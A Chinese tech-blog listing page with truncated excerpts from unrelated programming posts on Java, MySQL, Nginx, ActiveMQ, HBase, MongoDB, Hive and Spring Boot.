在java中ServerSocket用于服务器端，用来监听端口。通过服务器监听，客户端发送请求，双方建立链接后才能通信。当服务器和客户端建立链接后，两边都会产生一个Socket实例，我们可以通过操作Socket来建立通信。首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包 ServerSock
关于框架的简单认识西蜀石兰框架
入职两个月多，依然是一个不会写代码的小白，每天的工作就是看代码，写wiki。前端接触CSS、HTML、JS等语言，一直在用的CS模型，自然免不了数据库的链接及使用，真心涉及框架，项目中用到的BootStrap算一个吧，哦，JQuery只能算半个框架吧，我更觉得它是另外一种语言。后台一直是纯Java代码，涉及的框架是Quzrtz和log4j。都说学前端的要知道三大框架，目前node.
You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids ) values('0ac91f167f754c8cbac00e9e3dc372
MySQL5.6的my.ini配置 aigo mysql
注意：以下配置的服务器硬件是：8核16G内存 [client] port=3306 [mysql] default-character-set=utf8 [mysqld] port=3306 basedir=D:/mysql-5.6.21-win
mysql 全文模糊查找便捷解决方案 alxw4616 mysql
mysql 全文模糊查找便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
自定义数据结构链表(单项 ,双向,环形) 百合不是茶单项链表双向链表
链表与动态数组的实现方式差不多, 数组适合快速删除某个元素链表则可以快速的保存数组并且可以是不连续的单项链表;数据从第一个指向最后一个实现代码: //定义动态链表 clas
threadLocal实例 bijian1013 java thread java多线程 threadLocal
实例1： package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
activemq安全设置—设置admin的用户名和密码 bijian1013 java activemq
ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件，找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
本文详细介绍Java的范型，写一篇关于范型的博客原因有两个，前几天要写个范型方法(返回值根据传入的类型而定)，竟然想了半天，最后还是从网上找了个范型方法的写法；再者，前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理，看它的源代码就比较迷糊，只其然不知其所以然。所以，还是花点时间系统的整理总结下范型吧。范型内容范型集合类范型类
【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
在HBase中，每个HFile存储的是一个表中一个列族的数据，也就是说，当一个表中有多个列簇时，针对每个列簇插入数据，最后产生的数据是多个HFile，每个对应一个列族，通过如下操作验证 1. 建立一个有两个列族的表 create 'members','colfam1','colfam2' 2. 在members表中的colfam1中插入50*5
Nginx 官方一个配置实例 ronin47 nginx 配置实例
user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
java-15.输入一颗二元查找树，将该树转换为它的镜像，即在转换后的二元查找树中，左子树的结点都大于右子树的结点。用递归和循环 bylijinnan java
//use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
返回null还是empty bylijinnan java apache spring 编程
第一个问题，函数是应当返回null还是长度为0的数组（或集合）？第二个问题，函数输入参数不当时，是异常还是返回null？先看第一个问题有两个约定我觉得应当遵守： 1.返回零长度的数组或集合而不是null（详见《Effective Java》）理由就是，如果返回empty，就可以少了很多not-null判断： List<Person> list
[科技与项目]工作流厂商的战略机遇期 comsci 工作流
在新的战略平衡形成之前，这里有一个短暂的战略机遇期，只有大概最短6年，最长14年的时间，这段时间就好像我们森林里面的小动物，在秋天中，必须抓紧一切时间存储坚果一样，否则无法熬过漫长的冬季。。。。在微软，甲骨文，谷歌，IBM,SONY
过度设计-举例 cuityang 过度设计
过度设计，需要更多设计时间和测试成本，如无必要，还是尽量简洁一些好。未来的事情，比如访问量，比如数据库的容量，比如是否需要改成分布式都是无法预料的再举一个例子，对闰年的判断逻辑：　　1、 if($Year%4==0) return True; else return Fasle; 　　2、if ( ($Year%4==0 &am
java进阶，《Java性能优化权威指南》试读 darkblue086 java性能优化
记得当年随意读了微软出版社的.NET 2.0应用程序调试，才发现调试器如此强大，应用程序开发调试其实真的简单了很多，不仅仅是因为里面介绍了很多调试器工具的使用，更是因为里面寻找问题并重现问题的思想让我震撼，时隔多年，Java已经如日中天，成为许多大型企业应用的首选，而今天，这本《Java性能优化权威指南》让我再次找到了这种感觉，从不经意的开发过程让我刮目相看，原来性能调优不是简单地看看热点在哪里，
网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
协议：在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定　　计算机网络的体系结构：计算机网络的层次结构和各层协议的集合。　　两类服务：　　面向连接的服务通信双方在通信之前先建立某种状态，并在通信过程中维持这种状态的变化，同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。　　面向无连接的服务通信双方在通信前后不建立和维持状态，不为服务对象
mac中用命令行运行mysql dcj3sjt126com mysql linux mac
参考这篇博客：http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html 感觉workbench不好用（有点先入为主了）。 1，安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/，根据我的机器的配置情况选择了64
MongDB查询（1）——基本查询[五] eksliang mongodb mongodb 查询 mongodb find
MongDB查询转载请出自出处：http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....} 参数含义： query:查询参数 fie
base64，加密解密经融加密，对接 y806839048 经融加密对接
String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式，注意用于加密，解密的要是同
JavaWeb之JSP概述 ihuning javaweb
什么是JSP？为什么使用JSP？ JSP表示Java Server Page，即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。 JSP起源在很多动态网页中，绝大部分内容都是固定不变的，只有局部内容需要动态产生和改变。如果使用Servl
apple watch 指南啸笑天 apple
1. 文档 WatchKit Programming Guide（中译在线版 By @CocoaChina）译文译者原文概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
java经典的基础题目 macroli java 编程
1.列举出 10个JAVA语言的优势 a:免费，开源，跨平台(平台独立性)，简单易用，功能完善，面向对象，健壮性，多线程，结构中立，企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包，类，接口，对象，属性，方法，构造器，继承，封装，多态，抽象，范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象 regex
var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
[一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hive hive分析表 hive统计信息 hive Statistics
关键字：Hive统计信息、分析Hive表、Hive Statistics 类似于Oracle的分析表，Hive中也提供了分析表和分区的功能，通过自动和手动分析Hive表，将Hive表的一些统计信息存储到元数据中。表和分区的统计信息主要包括：行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等； 14.1 新表的统计信息对于一个新创建
Spring Boot 1.2.5 发布 wiselyman spring boot
Spring Boot 1.2.5已在7月2日发布，现在可以从spring的maven库和maven中心库下载。这个版本是一个维护的发布版，主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。官方建议所有的Spring Boot用户升级这个版本。项目首页 | 源